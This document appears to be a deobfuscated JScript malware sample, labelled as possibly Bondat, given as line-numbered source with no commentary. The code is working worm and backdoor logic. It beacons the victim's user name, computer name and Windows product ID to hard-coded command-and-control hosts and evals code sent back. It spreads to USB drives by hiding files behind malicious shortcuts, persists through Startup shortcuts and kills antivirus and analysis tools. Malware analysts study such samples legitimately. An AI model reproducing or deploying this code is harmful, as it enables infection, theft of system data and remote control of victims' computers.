Possible bondat

1. (function () {
2. var _ = {
3. v: '525',
4. a: '',
5. t: '0'
6. };
7. var a = new ActiveXObject('wscript.shell'), b = new ActiveXObject('scripting.filesystemobject'), h = function () {
8. return ((1 + Math.random()) * 65536 | 0).toString(16).substring(1);
9. }, d = a.environment('process'), f = d('username'), g = d('computername'), ru = new ActiveXObject('shell.application'), lo = [], fup = [], dod = '', dot = 0, hf = function (e) {
10. {
11. var n;
12. try {
13. var t = b.getFolder(e);
14. t.attributes = 2;
15. } catch (_n) {
16. n = _n;
17. {
18. }
19. }
20. }
21. }, sc = function (e) {
22. e += '';
23. var t = 0;
24. for (var n = 0; n < e.length; n++)
25. t = (t << 5) - t + e.charCodeAt(n), t &= t;
26. return Math.abs(t);
27. }, ha = function (e) {
28. var t = '', n = sc(e);
29. for (var r = 0; r < sc(e) % 5 + 5; r++)
30. n = sc(t + n), t += String.fromCharCode(n % 25 + 97);
31. return t;
32. };
33. var zzo = function () {
34. var ttw = [
35. 'http://www.microsoft.com/',
36. 'http://www.google.com/',
37. 'http://www.bing.com/'
38. ];
39. for (var i = 0, h, wep; i < ttw.length; i++) {
40. {
41. var e;
42. try {
43. var h = new ActiveXObject('MSXML2.ServerXMLHTTP.6.0');
44. h.open('GET', ttw[i]);
45. h.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36');
46. h.setRequestHeader('Cache-Control', 'no-cache');
47. h.setRequestHeader('Pragma', 'no-cache');
48. h.setRequestHeader('Connection', 'close');
49. h.send('');
50. wep = new Date(h.getAllResponseHeaders().split('Date: ').pop().split('\n').shift()).getTime() / 1000;
51. if (1388534400 < wep) {
52. return wep;
53. }
54. } catch (_e) {
55. e = _e;
56. {
57. }
58. }
59. }
60. }
61. return false;
62. };
63. var ent = function (efn) {
64. {
65. var e;
66. try {
67. a.run('%comspec% /c cacls "' + efn + '" /T /E /G Users:F /C', 0, true);
68. } catch (_e) {
69. e = _e;
70. {
71. }
72. }
73. }
74. }, hr = function (e) {
75. if (e)
76. var t = 1, n = 1;
77. else
78. var t = 2, n = 0;
79. {
80. var r;
81. try {
82. a.regWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden', t, 'REG_DWORD');
83. } catch (_r) {
84. r = _r;
85. {
86. }
87. }
88. }
89. {
90. var r;
91. try {
92. a.regWrite('HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowSuperHidden', n, 'REG_DWORD');
93. } catch (_r) {
94. r = _r;
95. {
96. }
97. }
98. }
99. };
100. var rc = function (key, str) {
101. var s = [], j = 0, x, res = '';
102. for (var i = 0; i < 256; i++) {
103. s[i] = i;
104. }
105. for (i = 0; i < 256; i++) {
106. j = (j + s[i] + key.charCodeAt(i % key.length)) % 256;
107. x = s[i];
108. s[i] = s[j];
109. s[j] = x;
110. }
111. i = 0;
112. j = 0;
113. for (var y = 0; y < str.length; y++) {
114. i = (i + 1) % 256;
115. j = (j + s[i]) % 256;
116. x = s[i];
117. s[i] = s[j];
118. s[j] = x;
119. res += String.fromCharCode(str.charCodeAt(y) ^ s[(s[i] + s[j]) % 256]);
120. }
121. return res;
122. };
123. var cob = function () {
124. return Math.floor((1 + Math.random()) * 65536).toString(16).substring(1);
125. };
126. var kk = 1;
127. var zbo = [
128. 'regedit',
129. 'windows-kb',
130. 'mrt',
131. 'rstrui',
132. 'msconfig',
133. 'procexp',
134. 'avast',
135. 'avg',
136. 'mse',
137. 'ptinstall',
138. 'sdasetup',
139. 'issetup',
140. 'fs20',
141. 'mbam',
142. 'housecall',
143. 'hijackthis',
144. 'rubotted',
145. 'autoruns',
146. 'avenger',
147. 'filemon',
148. 'gmer',
149. 'hotfix',
150. 'klwk',
151. 'mbsa',
152. 'procmon',
153. 'regmon',
154. 'sysclean',
155. 'tcpview',
156. 'unlocker',
157. 'wireshark',
158. 'fiddler',
159. 'resmon',
160. 'perfmon',
161. 'msss',
162. 'cleaner',
163. 'otl',
164. 'roguekiller',
165. 'fss',
166. 'zoek',
167. 'emergencykit',
168. 'dds',
169. 'ccsetup',
170. 'vbsvbe',
171. 'combofix',
172. 'frst',
173. 'mcshield',
174. 'zphdiag'
175. ];
176. var eth = function (str) {
177. var r = [];
178. var rr = '';
179. var e = str.length;
180. var c = 0;
181. var h;
182. var x = 'HsrPWXkyVtmGUTRzuqLiIZlJhjpQnvNwMogYKOSx'.split('');
183. while (c < e) {
184. h = str.charCodeAt(c++).toString(16);
185. while (h.length < 2)
186. h = '0' + h;
187. r.push(h);
188. }
189. for (var i = 0; i < r.length; i++) {
190. if (Math.round(Math.random() * 1))
191. rr += pw(x);
192. rr += r[i];
193. if (Math.round(Math.random() * 1))
194. rr += pw(x);
195. }
196. return rr;
197. };
198. var shh = function (o) {
199. for (var j, x, i = o.length; i; j = parseInt(Math.random() * i), x = o[--i], o[i] = o[j], o[j] = x);
200. return o;
201. };
202. var kp = function () {
203. if (b.fileExists(ofb + ha(g + '09')))
204. WScript.quit();
205. };
206. var zt = function () {
207. {
208. var e;
209. try {
210. var t = b.openTextFile(ofb + ha(g + '00'), 8, !0);
211. t.close();
212. a.run('%comspec% /c shutdown /p /f', 0);
213. } catch (_e) {
214. e = _e;
215. {
216. }
217. }
218. }
219. };
220. var fuu = function () {
221. var ttt = [];
222. for (var i = new Enumerator(b.getFolder(ofb).Files); !i.atEnd(); i.moveNext()) {
223. if (b.getExtensionName(i.item().Name) == 'exe')
224. ttt.push(ofb + i.item().Name);
225. }
226. return ttt;
227. };
228. var sha = function (too) {
229. for (var i = 0; i < lo.length; i++) {
230. if (too) {
231. {
232. var e;
233. try {
234. fup[lo[i]] = b.openTextFile(lo[i], 8, !0);
235. } catch (_e) {
236. e = _e;
237. {
238. }
239. }
240. }
241. } else {
242. {
243. var e;
244. try {
245. fup[lo[i]].close();
246. } catch (_e) {
247. e = _e;
248. {
249. }
250. }
251. }
252. }
253. }
254. };
255. var dof = function () {
256. if (dod != '' && dot + 60 * 60 * 6 * 1000 >= new Date().getTime()) {
257. return dod;
258. } else {
259. var doh = shh([
260. 'http://www.nycnote.in/',
261. 'http://95.153.31.22/',
262. 'http://95.153.31.18/',
263. 'http://www.nycnote.pw/'
264. ]);
265. var dec = '';
266. for (var doi = 0; doi < doh.length; doi++) {
267. {
268. var e;
269. try {
270. $('asl', doh[doi]);
271. var hgf = zxcvb;
272. dec = doh[doi];
273. } catch (_e) {
274. e = _e;
275. {
276. }
277. } finally {
278. delete zxcvb;
279. delete hgf;
280. }
281. }
282. if (dec != '')
283. break;
284. }
285. if (dec == '') {
286. return false;
287. } else {
288. dod = dec;
289. dot = new Date().getTime();
290. return dod;
291. }
292. }
293. };
294. var $ = function (fab, fat) {
295. var m = ofb + ha(g + '06');
296. var q = [
297. 'a',
298. 'b',
299. 'c',
300. 'd',
301. 'e',
302. 'f',
303. 'g',
304. 'h',
305. 'i',
306. 'j',
307. 'k',
308. 'l',
309. 'm',
310. 'n',
311. 'o',
312. 'p',
313. 'q',
314. 'r',
315. 's',
316. 't',
317. 'u',
318. 'v',
319. 'w',
320. 'x',
321. 'y',
322. 'z',
323. '0',
324. '1',
325. '2',
326. '3',
327. '4',
328. '5',
329. '6',
330. '7',
331. '8',
332. '9'
333. ];
334. var s = '';
335. for (var r = 0; r < 26; r++)
336. s += q[Math.round(Math.random() * 35)];
337. var v = eth(rc(s, fab + ';v=' + _.v + '&a=' + _.a + '&t=' + _.t + '&u=' + escape(f) + '&c=' + escape(g) + '&p=' + escape(w) + '&i=' + escape(tff) + '&e=' + escape(ll.join('-')) + '&b=' + escape(vn.join('.')) + '&s=' + escape(su)));
338. var yun = fat === 1 ? dof() : fat;
339. if (yun == false)
340. throw Error();
341. var j = new ActiveXObject('MSXML2.ServerXMLHTTP.6.0');
342. j.open('POST', yun);
343. j.setRequestHeader('Cache-Control', 'no-cache');
344. j.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
345. j.setRequestHeader('Content-Length', v.length);
346. j.setRequestHeader('Cookie', 'PHPSESSID=' + s);
347. j.setRequestHeader('User-Agent', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36');
348. j.setRequestHeader('Pragma', 'no-cache');
349. j.setRequestHeader('Connection', 'close');
350. j.send(v);
351. var c = new ActiveXObject('ADODB.Stream');
352. c.mode = 3;
353. c.type = 1;
354. c.open();
355. c.write(j.responseBody);
356. c.saveToFile(m, 2);
357. var k = b.openTextFile(m, 1);
358. var l = k.readAll();
359. k.close();
360. {
361. var e;
362. try {
363. b.deleteFile(m);
364. } catch (_e) {
365. e = _e;
366. {
367. }
368. }
369. }
370. var c, out = '', key = [];
371. l = l.split('<!-- ').pop().split(' -->').shift().split('');
372. for (var i = 0; i < 5; i++)
373. key.push(l.shift().charCodeAt(0) - 32);
374. for (var i = 0; i < l.length; i++) {
375. c = l[i].charCodeAt(0) - key[i % key.length];
376. out += String.fromCharCode(c < 32 ? 95 + c : c);
377. }
378. {
379. var e;
380. try {
381. eval(rewrite(out, true));
382. } catch (_e) {
383. e = _e;
384. {
385. }
386. }
387. }
388. };
389. var sk = function () {
390. var foc = 0;
391. {
392. var e;
393. try {
394. var cbo = ofb + ha(g + '11');
395. var t = b.openTextFile(cbo, 8, !0);
396. t.close();
397. ent(cbo);
398. if (!foc)
399. sha(0);
400. foc++;
401. ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + '10'), '', '', 0);
402. } catch (_e) {
403. e = _e;
404. {
405. }
406. }
407. }
408. {
409. var e;
410. try {
411. var cbo = ofb + ha(g + '13');
412. var t = b.openTextFile(cbo, 8, !0);
413. t.close();
414. ent(cbo);
415. if (!foc)
416. sha(0);
417. foc++;
418. ru.shellExecute(pw(w0), '"' + WScript.ScriptFullName + '" ' + ha(g + '12'), '', '', 0);
419. } catch (_e) {
420. e = _e;
421. {
422. }
423. }
424. }
425. if (foc) {
426. WScript.sleep(1500);
427. sha(1);
428. }
429. };
430. var pw = function (mp) {
431. return mp[Math.floor(Math.random() * mp.length)];
432. };
433. var w = '000';
434. {
435. var e;
436. try {
437. w = a.regRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductID');
438. } catch (_e) {
439. e = _e;
440. {
441. }
442. }
443. }
444. var vn = [
445. 0,
446. 0,
447. 0,
448. 0
449. ];
450. {
451. var e;
452. try {
453. for (var i = new Enumerator(GetObject('winmgmts:root\\cimv2').ExecQuery('SELECT * FROM Win32_OperatingSystem')); !i.atEnd(); i.moveNext()) {
454. vn = i.item()['version'].split('.');
455. if (vn[0] >= 5)
456. break;
457. }
458. } catch (_e) {
459. e = _e;
460. {
461. }
462. }
463. }
464. if (!vn[0])
465. vn[0] = b.folderExists(d('systemdrive') + '\\Users') ? 6 : 5;
466. var ll = [
467. '',
468. ''
469. ];
470. {
471. var e;
472. try {
473. var osl;
474. for (var i = new Enumerator(GetObject('winmgmts:root\\cimv2').ExecQuery('SELECT * FROM Win32_OperatingSystem')); !i.atEnd(); i.moveNext()) {
475. osl = (osl = i.item()['OSLanguage'].toString(16)).length == 4 ? osl : new Array(5 - osl.length).join('0') + osl;
476. ll = a.regRead('HKLM\\SOFTWARE\\Classes\\MIME\\Database\\Rfc1766\\' + osl).split(';')[0].split('-');
477. break;
478. }
479. } catch (_e) {
480. e = _e;
481. {
482. }
483. }
484. }
485. {
486. var e;
487. try {
488. var w0 = [];
489. var ofb = false;
490. var gg = b.getFolder(d('userprofile') + '\\..\\');
491. for (var i = new Enumerator(gg.SubFolders); !i.atEnd(); i.moveNext()) {
492. var bfo = i.item() + (vn[0] >= 6 ? '\\AppData\\Roaming\\' : '\\') + ha(g + '02') + '\\';
493. if (b.folderExists(bfo)) {
494. try {
495. var ZE = b.openTextFile(bfo + ha(g + '05'), 8, !0);
496. ZE.close();
497. var hd = bfo + ha(g + '03'), bfi = bfo + ha(g + '04') + '.js';
498. ent(bfo + '*');
499. hf(bfo);
500. ofb = bfo;
501. try {
502. b.copyFile(WScript.scriptFullName, bfi, true);
503. } catch (e) {
504. }
505. try {
506. var cvv = ofb + ha(g + '00');
507. var Oq = b.openTextFile(cvv, 8, !0);
508. ent(cvv);
509. try {
510. b.deleteFile(ofb + ha(g + '09'));
511. } catch (e) {
512. }
513. } catch (e) {
514. if (WScript.Arguments.length > 0) {
515. switch (WScript.Arguments(0)) {
516. case ha(g + '10'):
517. var cbo = ofb + ha(g + '11');
518. try {
519. var zbz = b.openTextFile(cbo, 8, !0);
520. } catch (e) {
521. WScript.quit();
522. }
523. ent(cbo);
524. while (true) {
525. try {
526. var oot = GetObject('winmgmts:root\\cimv2');
527. for (var dS = new Enumerator(oot.ExecQuery('SELECT * FROM Win32_DiskDrive')); !dS.atEnd(); dS.moveNext()) {
528. if (dS.item().Model.match(/usb/i)) {
529. var did = dS.item().DeviceID;
530. for (var dPS = new Enumerator(oot.ExecQuery('ASSOCIATORS OF {Win32_DiskDrive.DeviceID=\'' + did + '\'} WHERE AssocClass=Win32_DiskDriveToDiskPartition')); !dPS.atEnd(); dPS.moveNext()) {
531. var pID = dPS.item().DeviceID;
532. for (var lDS = new Enumerator(oot.ExecQuery('ASSOCIATORS OF {Win32_DiskPartition.DeviceID=\'' + pID + '\'} WHERE AssocClass=Win32_LogicalDiskToPartition')); !lDS.atEnd(); lDS.moveNext()) {
533. var lD = lDS.item().DeviceID + '\\', trr = 'Files\\', trd = lD + trr, poor = sc(g) % 500 + 405 + '\\', por = trr + poor, pod = lD + por, piir = ha(g + '01') + '.js', pir = por + ha(g + '01') + '.js', pid = lD + pir, bat = lD + 'Files.bat';
534. try {
535. var gf = b.getFolder(trd);
536. for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
537. var ff = (fS.item() + '').split('\\').pop();
538. if (ff.length == 3 && !isNaN(parseFloat(ff)) && isFinite(ff)) {
539. var fg = b.getFolder(trd + ff);
540. for (var Sf = new Enumerator(fg.Files); !Sf.atEnd(); Sf.moveNext()) {
541. var fff = (Sf.item() + '').split('\\').pop();
542. if (b.getExtensionName(fff).toLowerCase() == 'js') {
543. try {
544. b.copyFile(WScript.scriptFullName, trd + ff + '\\' + fff, true);
545. } catch (e) {
546. }
547. }
548. }
549. }
550. }
551. } catch (e) {
552. }
553. if (b.fileExists(bfo + '0.gz') === false) {
554. try {
555. b.createFolder(trd);
556. } catch (e) {
557. }
558. try {
559. b.createFolder(pod);
560. } catch (e) {
561. }
562. hf(trd), hf(pod);
563. try {
564. var otff = b.openTextFile(bat, 2, 1);
565. otff.writeLine('cd Files\\' + poor), otff.writeLine('%homedrive%\\Windows\\System32\\cmd.exe /c start wscript ' + piir), otff.writeLine('exit'), otff.close();
566. } catch (e) {
567. }
568. var bro = [
569. 127,
570. 128,
571. 129
572. ];
573. try {
574. var gf = b.getFolder(lD);
575. for (var fS = new Enumerator(gf.SubFolders); !fS.atEnd(); fS.moveNext()) {
576. var ff = (fS.item() + '').split(':\\').pop();
577. if (ff.substr(0, 1) != '.' && ff.substr(0, 1) != '$' && ff.match(/recycle/i) == null && ff.match(/System Volume/) == null && ff.match(/Files/) == null) {
578. with (a.createShortcut(lD + ff + '.lnk'))
579. targetPath = '%homedrive%\\Windows\\System32\\cmd.exe', windowStyle = 7, arguments = '/c cmd.exe /c "set abc=Files.bat&& set xyz=explorer&& %homedrive%\\Windows\\System32\\cmd.exe /c %abc%&& %homedrive%\\Windows\\System32\\cmd.exe /c %xyz% "' + trr + ff + '"', iconLocation = '%homedrive%\\system32\\shell32.dll,' + pw(bro), save();
580. try {
581. var t = b.getFolder(lD + ff);
582. t.move(trd + ff);
583. } catch (e) {
584. }
585. hf(trd + ff);
586. }
587. }
588. } catch (e) {
589. }
590. try {
591. var gf = b.getFolder(lD);
592. for (var fS = new Enumerator(gf.Files); !fS.atEnd(); fS.moveNext()) {
593. var ff = (fS.item() + '').split(':\\').pop();
594. var exx = b.getExtensionName(ff).toLowerCase();
595. if (exx != 'lnk' && exx != 'bat' && exx != '' && exx != 'js' && ff.toLowerCase() != 'autorun.inf' && ff.substr(0, 1) != '.' && ff.substr(0, 1) != '$' && ff.match(/recycle/i) == null) {
596. var exo = 0;
597. switch (exx) {
598. case 'exe':
599. exo = 261;
600. break;
601. case 'doc':
602. case 'docx':
603. case 'pdf':
604. exo = 73;
605. break;
606. case 'rtf':
607. case 'txt':
608. exo = 70;
609. break;
610. case 'mp3':
611. case 'm4a':
612. case 'ogg':
613. case 'wav':
614. case 'wma':
615. exo = 116;
616. break;
617. case 'mp4':
618. case 'avi':
619. case 'webm':
620. case 'flv':
621. case 'mov':
622. case 'wmv':
623. case 'mpeg':
624. case 'mpg':
625. exo = 115;
626. break;
627. case 'gif':
628. case 'jpg':
629. case 'jpeg':
630. case 'png':
631. exo = 302;
632. break;
633. }
634. with (a.createShortcut(lD + ff + '.lnk'))
635. targetPath = '%homedrive%\\Windows\\System32\\cmd.exe', windowStyle = 7, arguments = '/c cmd.exe /c "set abc=Files.bat&& cmd.exe /c %abc%&& %homedrive%\\Windows\\System32\\cmd.exe /c "' + trr + ff + '"', iconLocation = '%homedrive%\\system32\\shell32.dll,' + exo, save();
636. try {
637. b.moveFile(lD + ff, trd + ff);
638. } catch (e) {
639. }
640. hf(trd + ff);
641. }
642. }
643. } catch (e) {
644. }
645. try {
646. b.copyFile(WScript.scriptFullName, pid, true);
647. } catch (e) {
648. }
649. }
650. }
651. }
652. }
653. }
654. } catch (e) {
655. }
656. kp();
657. zt();
658. WScript.sleep(14000);
659. }
660. break;
661. case ha(g + '12'):
662. var cbo = ofb + ha(g + '13');
663. try {
664. var zbz = b.openTextFile(cbo, 8, !0);
665. } catch (e) {
666. WScript.quit();
667. }
668. ent(cbo);
669. while (true) {
670. try {
671. var t = GetObject('winmgmts:root\\cimv2');
672. for (var i = new Enumerator(t.ExecQuery('SELECT * FROM Win32_Process')); !i.atEnd(); i.moveNext()) {
673. var it = i.item();
674. if (it['name'].match(new RegExp(zbo.join('|'), 'i'))) {
675. try {
676. if (it.terminate() == 0 && it['ExecutablePath'] && !it['ExecutablePath'].match(/windows|program/i)) {
677. var tp = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
678. var tq = ((8193 + Math.random()) * 30582 | 0).toString(16).substring(1);
679. a.popup('Application has generated an exception that could not be handled.\n\nProcess id=0x' + tp + ' (' + parseInt(tp, 16) + '), Thread id=0x' + tq + ' (' + parseInt(tq, 16) + ').\n\nClick OK to terminate the application.\nClick CANCEL to debug the application.', 8, it['name'] + ' - Common Language Runtime Debugging Services', 1 + 48 + 4096);
680. }
681. } catch (e) {
682. }
683. }
684. }
685. } catch (e) {
686. }
687. kp();
688. zt();
689. WScript.sleep(400);
690. }
691. break;
692. }
693. }
694. if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) == false)
695. WScript.quit();
696. }
697. if ((WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) == false) {
698. try {
699. a.run('%comspec% /c del /F /S /Q "' + bfo + '*.exe"', 0, true);
700. WScript.sleep(500);
701. } catch (e) {
702. }
703. ww = ha(Math.random());
704. mm = Math.ceil(Math.random() * 5);
705. if (mm > 3)
706. ww += mm > 4 ? '64' : '32';
707. ww += '.exe';
708. b.copyFile(d('systemroot') + '\\system32\\wscript.exe', bfo + ww, true);
709. ent(bfo + ww);
710. w0.push(bfo + ww);
711. } else {
712. w0 = fuu();
713. }
714. var fet = w0[0];
715. var su = 0;
716. try {
717. var pp = d('systemdrive') + '\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\';
718. var p = pp + 'Start.lnk';
719. with (a.createShortcut(p))
720. targetPath = '"' + fet + '"', windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = '%systemroot%\\system32\\shell32.dll,3', save();
721. ent(p);
722. su++;
723. lo.push(p);
724. var cbb = [
725. 'Windows Explorer.lnk',
726. 'empezar.lnk',
727. 'atajo.lnk'
728. ];
729. for (var i1 = 0; i1 < cbb.length; i1++) {
730. try {
731. b.deleteFile(pp + cbb[i1]);
732. } catch (e) {
733. }
734. }
735. } catch (e) {
736. }
737. try {
738. var h = b.getFolder(d('userprofile') + '\\..\\');
739. for (var j = new Enumerator(h.SubFolders); !j.atEnd(); j.moveNext()) {
740. var k = j.item();
741. for (var i = 0; i < f.length; i++) {
742. try {
743. var pp = k + (vn[0] >= 6 ? '\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\' : '\\Start Menu\\Programs\\Startup\\');
744. var p = pp + 'Start.lnk';
745. with (a.createShortcut(p))
746. targetPath = '"' + fet + '"', windowStyle = 1, arguments = '"' + bfi + '"', iconLocation = '%systemroot%\\system32\\shell32.dll,3', save();
747. ent(p);
748. lo.push(p);
749. var cbb = [
750. 'Windows Explorer.lnk',
751. 'empezar.lnk',
752. 'atajo.lnk'
753. ];
754. for (var i1 = 0; i1 < cbb.length; i1++) {
755. try {
756. b.deleteFile(pp + cbb[i1]);
757. } catch (e) {
758. }
759. }
760. } catch (e) {
761. }
762. }
763. }
764. } catch (e) {
765. }
766. if (WScript.ScriptFullName.split('\\').shift() == d('systemdrive'))
767. lo.push(WScript.ScriptFullName);
768. var tc = d('temp') + '\\' + ha(g + '08') + '.js';
769. if (WScript.Arguments.length > 0 && WScript.Arguments(0) == ha(g + '07')) {
770. try {
771. b.deleteFile(tc);
772. } catch (e) {
773. }
774. WScript.quit();
775. } else if (su == 0) {
776. try {
777. Oq = b.openTextFile(ofb + ha(g + '00'), 8, !0);
778. } catch (e) {
779. }
780. }
781. hr(0);
782. sha(1);
783. sk();
784. kk = 0;
785. break;
786. } catch (e) {
787. }
788. }
789. }
790. if (kk) {
791. var bbs = d('userprofile') + (vn[0] >= 6 ? '\\AppData\\Roaming\\' : '\\') + ha(g + '02'), bbz = bbs + '\\' + ha(g + '04') + '.js';
792. try {
793. b.createFolder(bbs);
794. } catch (e) {
795. }
796. ent(bbs);
797. b.copyFile(WScript.ScriptFullName, bbz, true);
798. ent(bbz);
799. try {
800. Oq.close();
801. } catch (e) {
802. }
803. ru.shellExecute('wscript.exe', '"' + WScript.ScriptFullName + '" ' + ha(g + '14'), '', '', 0);
804. WScript.quit();
805. }
806. } catch (_e) {
807. e = _e;
808. {
809. WScript.quit();
810. }
811. }
812. }
813. var tff = 'e', otf;
814. if (b.fileExists(hd)) {
815. {
816. var e;
817. try {
818. otf = b.openTextFile(hd, 1);
819. tff = otf.readAll(), otf.close();
820. } catch (_e) {
821. e = _e;
822. {
823. }
824. }
825. }
826. } else {
827. {
828. var e;
829. try {
830. tff = cob() + cob() + '-' + cob() + '-' + cob() + '-' + cob() + '-' + cob() + cob() + cob();
831. otf = b.openTextFile(hd, 2, 1);
832. otf.write(tff), otf.close();
833. } catch (_e) {
834. e = _e;
835. {
836. }
837. }
838. }
839. }
840. ent(hd);
841. while (true) {
842. if (zzo() !== false) {
843. while (true) {
844. {
845. var e;
846. try {
847. $('', 1);
848. for (var i = new Date().getTime(); i + 60 * 53 * 1000 >= new Date().getTime(); sk())
849. WScript.sleep(2000);
850. } catch (_e) {
851. e = _e;
852. {
853. if (zzo() == false)
854. break;
855. for (var i = new Date().getTime(); i + 8000 >= new Date().getTime(); sk())
856. WScript.sleep(2000);
857. }
858. }
859. }
860. }
861. } else {
862. for (var i = new Date().getTime(); i + 60 * 3 * 1000 >= new Date().getTime(); sk())
863. WScript.sleep(2000);
864. }
865. }
866. }());